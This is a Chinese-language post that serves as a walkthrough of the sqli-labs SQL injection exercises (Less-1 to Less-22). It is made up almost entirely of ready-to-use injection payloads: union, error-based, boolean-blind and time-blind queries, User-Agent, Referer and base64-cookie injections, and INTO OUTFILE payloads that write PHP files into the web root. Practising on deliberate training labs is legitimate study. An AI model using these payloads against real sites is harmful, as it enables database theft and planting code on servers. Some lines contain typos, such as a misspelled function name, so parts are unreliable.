标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3174] 作者: 闲云野鸡 发表于: [2022-09-09]
本文共 [483] 位读者顶过
Less1联合注入构造payload,查询到基本数据库信息 [出自:jiwo.org] ?id=-1' union select 1,group_concat((select database()),':',(select user()),':',(select version())),3%23
报错注入查询所有库名,payload如下 ?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),1,31))))%23 ?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),32,31))))%23 ?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),63,31))))%23
布尔盲注payload如下 ?id=1' and if(length((select database()))>0,1,0)%23
时间盲注payload如下 ?id=1' and sleep(5)%23
Less-2联合注入构造payload,查询到基本数据库信息 ?id=-1 union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23
报错注入payload如下 ?id=1 and extractvalut(1,concat(0x7e,(select database())))%23 ?id=-1 and updatexml(1,(concat(0x7e,((select database())))),3)%23
布尔盲注?id=1 and if(length((select database()))>0,1,0)%23
时间盲注?id=1 and if(length((select database()))>0,sleep(5),0)%23
Less-3联合注入构造payload,查询到基本数据库信息 ?id=-1') union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23
报错注入?id=-1') and updatexml(1,(concat(0x7e,((select database())))),3)%23 ?id=-1') and extractvalue(1,(concat(0x7e,((select database())))))%23
布尔盲注?id=1') and if(length((select database()))>0,1,0)%23
时间盲注?id=1') and if(length((select database()))>0,sleep(2),0)%23
Less-4联合注入构造payload,查询到基本数据库信息 ?id=-1") union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23
报错注入?id=1") and updatexml(1,(concat(0x7e,((select database())))),3)%23 ?id=1") and extractvalue(1,(concat(0x7e,((select database())))))%23
布尔盲注?id=1") and if(length((select database()))>0,1,0)%23
时间盲注?id=1") and if(length((select database()))>0,sleep(2),0)%23
Less-5报错注入?id=5' and extractvalue(1,(concat(0x7e,(select database()))))%23 ?id=5' and updatexml(1,(concat(0x7e,(select database()))),3)%23
布尔盲注?id=5' and if(length((select database()))>0,1,0)%23
时间盲注?id=5' and if(length((select database()))>0,sleep(2),0)%23
Less-6报错注入?id=1" and extractvalue(1,(concat(0x7e,(select database()))))%23 ?id=1" and updatexml(1,(concat(0x7e,(select database()))),3)%23
布尔盲注?id=1" and if(length((select database()))>0,1,0)%23
时间盲注?id=1" and if(length((select database()))>0,sleep(2),0)%23
Less-7联合查询注入
?id=1')) INTO OUTFILE '/var/www/html/phpinfo1.php' lines terminated by '<?=phpinfo();?>'%23 ?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo2.php' lines starting by '<?=phpinfo();?>'%23 ?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo4.php' fields terminated by '<?=phpinfo();?>'%23 ?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo4.php' columns terminated by '<?=phpinfo();?>'%23
布尔盲注?id=1')) and if(length((select database()))>0,1,0)%23
时间盲注?id=1')) and if(length((select database()))>0,sleep(2),0)%23
Less-8布尔盲注利用布尔盲注猜解处数据库,payload如下 ?id=1' and if(mid((select database()),1,1)='s',sleep(2),0)%23 ?id=1' and if(mid((select database()),2,1)='e',sleep(2),0)%23 ?id=1' and if(mid((select database()),3,1)='c',sleep(2),0)%23 ?id=1' and if(mid((select database()),4,1)='u',sleep(2),0)%23 ?id=1' and if(mid((select database()),5,1)='r',sleep(2),0)%23 ?id=1' and if(mid((select database()),6,1)='i',sleep(2),0)%23 ?id=1' and if(mid((select database()),7,1)='t',sleep(2),0)%23 ?id=1' and if(mid((select database()),8,1)='y',sleep(2),0)%23
最终猜解出来的数据库名为security 时间盲注?id=1' and if(length((select database()))>0,sleep(5),0)%23
Less-9时间盲注?id=1' and if(length((select database()))>0,sleep(5),0)%23
Less-10时间盲注?id=1" and if(length((select database()))>0,sleep(5),0)%23
Less-11联合查询注入uname=-admin' union select 1,database()%23&passwd=asdf&submit=Submit
报错注入uname=admin' and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdf&submit=Submit uname=admin' and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdf&submit=Submit
布尔盲注uname=admin' and if(length((select database()))>0,1,0)%23&passwd=asdf&submit=Submit
时间盲注uname=admin' and if(length((select database()))>0,sleep(5),0)%23&passwd=asdf&submit=Submit
Less-12联合查询注入uname=-admin") union select 1,database()%23&passwd=asdf&submit=Submit
报错注入uname=-admin") and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdf&submit=Submit uname=-admin") and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdf&submit=Submit
布尔盲注uname=admin") and if(length((select database()))>0,1,0)%23&passwd=asdf&submit=Submit
时间盲注uname=admin") and if(length((select database()))>0,sleep(3),0)%23&passwd=asdf&submit=Submit
Less-13报错注入uname=admin') and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdgfasdg&submit=Submit uname=admin') and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdgfasdg&submit=Submit
时间盲注uname=admin') and if(length((select database()))>0,sleep(2),0)%23&passwd=asdgfasdg&submit=Submit
Less-14报错注入uname=admin" and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdfas&submit=Submit uname=admin" and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdfas&submit=Submit
时间盲注uname=admin" and if(length((select database()))>0,sleep(3),0)%23&passwd=asdfas&submit=Submit
Less-15时间盲注uname=admin'+and+if(length((select database()))>0,sleep(3),0)%23&passwd=asdfasdf&submit=Submit
Less-16时间盲注uname=admin")+and+if(length((select database()))>0,sleep(3),0)%23&passwd=asdfasdf&submit=Submit
Less-17报错注入uname=admin&passwd=asdfas' and extractvalue(1,concat(0x7e,(select database())))%23&submit=Submit uname=admin&passwd=asdfas' and updatexml(1,concat(0x7e,(select database())),3)%23&submit=Submit
Less-18User-Agent头注入header头注入结合报错,payload如下 ' and extractvalue(1,concat(0x7e,(select database()))),' ' and updatexml(1,concat(0x7e,(select database())),3),'
Less-19header头注入(Referer)' and extractvalue(1,concat(0x7e,(select database()))),' ' and updatexml(1,concat(0x7e,(select database())),3),'
Less-20联合查询注入
uname=-admin' union select 1,database(),3%23
报错注入
uname=admin' and extractvalue(1,concat(0x7e,(select database())))%23 uname=admin' and updatexml(1,concat(0x7e,(select database())),3)%23
布尔盲注
uname=admin' and if(length((select database()))>0,1,0)%23
时间盲注
uname=admin' and if(length((select database()))>0,sleep(3),0)%23
Less-21联合注入uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCBkYXRhYmFzZSgpKSwzIw==
header头注入/base64注入(cookie)
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpIw== uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMykj
uname=YWRtaW4nKSBhbmQgaWYobGVuZ3RoKChzZWxlY3QgZGF0YWJhc2UoKSkpPjAsMSwwKSM=
uname=YWRtaW4nKSBhbmQgaWYobGVuZ3RoKChzZWxlY3QgZGF0YWJhc2UoKSkpPjAsc2xlZXAoMyksMCkj
Less-22联合注入uname=LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGRhdGFiYXNlKCkpLDMj
header头注入/base64(cookie)
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSkj YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSwzKSM=
|